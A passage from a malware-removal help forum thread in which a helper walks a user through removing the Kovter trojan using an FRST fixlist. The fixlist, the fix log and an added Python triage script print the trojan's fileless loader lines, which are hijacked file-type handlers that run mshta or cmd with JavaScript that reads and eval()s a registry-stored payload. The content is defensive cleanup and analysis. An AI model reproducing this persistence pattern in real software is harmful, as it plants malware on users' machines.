
Possible Infection


#91 preacherswife (Member, Topic Starter, 193 posts)

After rebooting, I can now access the Internet and things look pretty normal.  After nearly 24 hours, I finally feel somewhat relieved!  


#92 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
Now we need to remove the malware. You have a Trojan called "Kovter" on the machine.

Download the enclosed file (attached: fixlist.txt, 1.39 KB). Save it in the location FRST64 is: C:\Users\Dorraine\Downloads. Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, C:\Users\Dorraine\Downloads (Fixlog.txt). Please post it to your reply.

#93 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
If you need a break we can pick this up tomorrow...

#94 preacherswife (Member, Topic Starter, 193 posts)

Joe, I'm a little confused on what you have asked me to do. 
Here is what I have...

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION
DeleteKey: HKCU\\software\\ppfkbxc
DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> No File
Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()
C:\Users\Dorraine\AppData\Local\Ygogud Ri
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:



#95 preacherswife (Member, Topic Starter, 193 posts)

Joe, if you have the time, I would rather continue until this is resolved.  I do not want to interfere with what you need to do or have to do.  If you need to leave, we can certainly pick this up again tomorrow.



#96 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
In post 92 click FIXLIST. In the window, check "save file" and hit OK. Let me know if you have the file on the desktop, or it could be here: C:\Users\Dorraine\Downloads

#97 preacherswife (Member, Topic Starter, 193 posts)

Under downloads, I have one that was added on 10/24 at 10:49 and the second one is named fixlist(1) which was added at 11:03.  That's the only thing I'm seeing.



#98 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
Now open FRST64 and click fix

#99 preacherswife (Member, Topic Starter, 193 posts)

It's running now and said it could take a few minutes.



#100 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
It should be rather quick. It will create a log file called Fixlog.txt under the Downloads folder. Copy the log and paste it to a reply.
#101 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
If you're having trouble, delete one of the fixlists in the Downloads folder (right click and delete). Then right click on FRST64, choose "Run as administrator" and click FIX. Post the Fixlog.txt.

#102 preacherswife (Member, Topic Starter, 193 posts)

Fix result of Farbar Recovery Scan Tool (x64) Version: 23-10-2017 01
Ran by Dorraine (24-10-2017 23:14:04) Run:6
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine (Available Profiles: Dorraine & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION
DeleteKey: HKCU\\software\\ppfkbxc
DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> No File
Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()
C:\Users\Dorraine\AppData\Local\Ygogud Ri
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe => key removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc => key removed successfully
HKCU\\software\\ppfkbxc => key removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc => key not found.

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========

HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\Gadgets => key removed successfully
HKLM\Software\Classes\CLSID\{6B9228DA-9C15-419e-856C-19E768A13BDC} => key not found.
C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk => moved successfully
C:\Users\Dorraine\AppData\Local\Ygogud Ri => moved successfully
C:\ProgramData\TEMP => ":5C321E34" ADS removed successfully.

========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset catalog =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8675328 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 64554766 B
Java, Flash, Steam htmlcache => 1649 B
Windows/system/drivers => 369910 B
Edge => 5758155 B
Chrome => 8577624 B
Firefox => 367283731 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 5962 B
NetworkService => 2206682 B
Dorraine => 75362577 B
DefaultAppPool => 0 B

RecycleBin => 24232372 B
EmptyTemp: => 531.2 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 23:29:30 ====


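The fixlist above shows the whole Kovter persistence chain in four lines: a .lnk in AppData points at a .bat, the .bat opens a file with a random extension (.ajpup), the ProgID handler for that extension under HKCU\Software\Classes runs cmd.exe or mshta.exe with a javascript: URL, and that script only does a RegRead() of another registry value and eval()s whatever it finds there. The real payload is that registry value, so a cleanup that removes the handler but not the storage key leaves the malware recoverable. The following Python script is an added example for this thread (not code from the original posts and not part of FRST): it parses the registry, DeleteKey and Shortcut lines exactly as they appear in the fixlist, extracts the chain, and checks that the storage key named by RegRead() is covered by a DeleteKey directive. The function names, indicator labels and the LOLBin and extension lists are this example's own choices; the sample lines are copied from the fixlist above.

```python
"""Triage the Kovter persistence chain out of FRST-style fixlist lines.

Added example for this thread; not part of the original posts and not FRST
code. It parses the registry, DeleteKey and Shortcut lines as they appear in
the fixlist above and reports which ProgID handler is hijacked, which LOLBin
it runs, which registry value the JavaScript stub RegRead()s and eval()s
(the real payload lives there, not on disk), and whether the fixlist deletes
that storage key. Function names, indicator labels and the LOLBin/extension
lists are this example's own choices.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Optional

# Lines copied from the fixlist posted in this thread (SID, paths, key names as shown).
FIXLIST_LINES = [
    r'HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION',
    r'HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION',
    r'DeleteKey: HKCU\\software\\ppfkbxc',
    r'DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc',
    r'Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()',
]

HANDLER_RE = re.compile(r'^(?P<hive>HKU\\S-1-5-[\d-]+|HKCU)\\Software\\Classes\\(?P<progid>[^\\:]+):\s*'
                        r'(?P<cmd>.*?)(?:\s*<====\s*ATTENTION)?\s*$', re.I)
SHORTCUT_RE = re.compile(r'^Shortcut:\s*(?P<lnk>.+?\.lnk)\s*->\s*(?P<target>.+?)\s*\([^)]*\)\s*$', re.I)
DELETEKEY_RE = re.compile(r'^DeleteKey:\s*(?P<key>\S.*?)\s*$', re.I)
REGREAD_RE = re.compile(r'RegRead\(\s*"(?P<key>[^"]+)"\s*\)', re.I)
PATH_RE = re.compile(r'"(?P<path>[A-Za-z]:\\[^"]+)"')
LOLBINS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe", "cmd.exe")
EXEC_EXT = {".exe", ".dll", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".lnk"}
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}


def norm_key(key: str) -> str:
    """Collapse the JS-escaped '\\\\' to '\\' and drop a trailing separator."""
    return key.replace("\\\\", "\\").rstrip("\\")


def file_ext(path: str) -> str:
    return os.path.splitext(path.rsplit("\\", 1)[-1])[1].lower()


@dataclass
class Handler:
    key: str
    progid: str
    command: str
    lolbins: list = field(default_factory=list)
    launched: list = field(default_factory=list)
    payload_key: Optional[str] = None
    indicators: list = field(default_factory=list)

    @property
    def fileless_loader(self) -> bool:
        # Kovter signature: script URL + registry read + eval in one shell handler.
        return {"javascript-url", "regread", "eval"} <= set(self.indicators)


def parse_handler(line: str) -> Optional[Handler]:
    m = HANDLER_RE.match(line)
    if not m:
        return None
    cmd = m.group("cmd")
    low = cmd.lower()
    h = Handler(key=f"{m.group('hive')}\\Software\\Classes\\{m.group('progid')}",
                progid=m.group("progid"), command=cmd)
    h.lolbins = [b for b in LOLBINS if b in low]
    h.launched = [p.group("path") for p in PATH_RE.finditer(cmd)]
    if "javascript:" in low:
        h.indicators.append("javascript-url")
    rr = REGREAD_RE.search(cmd)
    if rr:  # the value read here is where the second-stage script is stored
        h.payload_key = norm_key(rr.group("key"))
        h.indicators.append("regread")
    if re.search(r"\beval\s*\(", cmd):
        h.indicators.append("eval")
    for p in h.launched:  # random extension under AppData = Kovter's file-type hijack
        ext = file_ext(p)
        if ext not in EXEC_EXT and "\\appdata\\" in p.lower():
            h.indicators.append(f"odd-extension:{ext}")
    return h


def analyze(lines: list) -> dict:
    handlers, shortcuts, deleted = [], [], []
    for line in (l.strip() for l in lines):
        if h := parse_handler(line):
            handlers.append(h)
        elif s := SHORTCUT_RE.match(line):
            target = s.group("target")
            bad = "\\appdata\\" in target.lower() and file_ext(target) in SCRIPT_EXT
            shortcuts.append((s.group("lnk"), target, bad))
        elif d := DELETEKEY_RE.match(line):
            deleted.append(norm_key(d.group("key")).lower())
    payload_keys = {h.payload_key.lower() for h in handlers if h.payload_key}
    # Removing the handlers is not enough: the eval()'d script in the storage key must go too.
    covered = all(any(k == d or k.startswith(d + "\\") for d in deleted) for k in payload_keys)
    return {"handlers": handlers, "shortcuts": shortcuts, "deleted_keys": deleted,
            "payload_keys": payload_keys, "payload_removed": bool(payload_keys) and covered}


def report(result: dict) -> str:
    out = []
    for h in result["handlers"]:
        verdict = "FILELESS LOADER" if h.fileless_loader else "review"
        out.append(f"[{verdict}] {h.key}")
        out.append(f"    runs: {', '.join(h.lolbins) or '-'}   launches: {', '.join(h.launched) or '-'}")
        out.append(f"    payload key: {h.payload_key or '-'}   indicators: {', '.join(h.indicators)}")
    for lnk, target, bad in result["shortcuts"]:
        out.append(f"[{'SUSPICIOUS' if bad else 'ok'}] {lnk} -> {target}")
    out.append(f"payload storage key deleted by fixlist: {result['payload_removed']}")
    return "\n".join(out)


if __name__ == "__main__":
    print(report(analyze(FIXLIST_LINES)))
```

Run it as-is and both handlers come out as fileless loaders that read HKCU\software\ppfkbxc\ouvapr, the .lnk is flagged because it points at a .bat under AppData, and the storage-key check passes because the fixlist's DeleteKey: HKCU\\software\\ppfkbxc covers the parent of that value. The same parser can be pointed at the matching lines of a fresh FRST.txt from another machine; what it cannot do is decode the payload itself, which is only readable from the live registry before the key is deleted.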

#103 preacherswife (Member, Topic Starter, 193 posts)

In case you are wondering, I did reboot my computer.  



#104 zep516 (Trusted Helper, Malware Removal, 8,093 posts)
Well done.

Please run AdwCleaner once more. Right click and run as admin. Click Scan. After the scan is done, click "Clean".

And that should do it. The Trojan was removed.

#105 preacherswife (Member, Topic Starter, 193 posts)

Joe, what can I do to prevent this from happening again?  Also, I am currently running the following programs...

CryptoPrevent
Malwarebytes (which has expired)
SpywareBlaster
SUPERAntiSpyware Free Edition
Windows Defender

What do I need to do about the Malwarebytes, and do you think there is anything I need to add or delete?

